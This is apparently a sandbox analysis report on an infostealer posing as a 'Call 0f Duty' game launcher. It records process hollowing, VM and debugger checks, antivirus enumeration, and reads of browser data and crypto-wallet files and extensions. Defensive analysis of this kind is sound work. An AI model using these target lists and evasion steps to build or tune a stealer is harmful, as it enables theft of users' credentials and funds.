              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_003715A00_2_003715A0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0036F9800_2_0036F980
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0036CE700_2_0036CE70
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_003686C00_2_003686C0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0036D7F00_2_0036D7F0
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00381FD20_2_00381FD2
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: String function: 003755C0 appears 33 times
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: Section: .coS ZLIB complexity 1.0003339213709677
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2090298680.0000000005CD4000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2090642376.0000000005CB5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112895324.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Call 0f Duty A1 Launcher.exeReversingLabs: Detection: 44%
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile read: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: section name: .00cfg
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: section name: .coS
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00374BC5 push ecx; ret 0_2_00374BD8
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03580CA6 push ecx; retf 3_3_03580CA7
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_0357E751 push esp; iretd 3_3_0357E752
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_0357E751 push esp; iretd 3_3_0357E752
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_0357DF20 push edx; ret 3_3_0357DF21
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_0357DF20 push edx; ret 3_3_0357DF21
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03580CA6 push ecx; retf 3_3_03580CA7
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_0358CC08 pushad ; retf 3_3_0358CC09
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03597753 push ds; retf 3_3_03597756
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03597753 push ds; retf 3_3_03597756
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03597753 push ds; retf 3_3_03597756
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03597753 push ds; retf 3_3_03597756
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03597753 push ds; retf 3_3_03597756
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03597753 push ds; retf 3_3_03597756
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03597753 push ds; retf 3_3_03597756
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 3_3_03595C4B push ds; retf 3_3_03595DBA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00374CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00374CA2
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe TID: 6788Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe TID: 6788Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0037C72A FindFirstFileExW,0_2_0037C72A
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0037C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0037C7DB
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667369758.00000000034D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112408039.0000000005CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2467865552.0000000003514000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000002.2667480216.0000000003514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112408039.0000000005CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112540138.0000000005CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00375444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00375444
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0036CD10 mov eax, dword ptr fs:[00000030h]0_2_0036CD10
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0038B18D mov edi, dword ptr fs:[00000030h]0_2_0038B18D
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0036BD50 mov edi, dword ptr fs:[00000030h]0_2_0036BD50
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00379F90 GetProcessHeap,0_2_00379F90
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00375438 SetUnhandledExceptionFilter,0_2_00375438
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00375444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00375444
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00377DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00377DCA
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00374AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00374AD9

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_0038B18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0038B18D
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeMemory written: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeProcess created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_00375200 cpuid 0_2_00375200
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_003758C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_003758C5
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2184905970.0000000003573000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2181439440.0000000003587000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000003.00000003.2181520167.0000000003572000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 4832, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: Wallets/Electrum
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: Wallets/ElectronCash
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: Jaxx Liberty
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: window-state.json
              Source: Call 0f Duty A1 Launcher.exe, 00000003.00000003.2112166479.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: ExodusWeb3
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: Wallets/Ethereum
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Call 0f Duty A1 Launcher.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
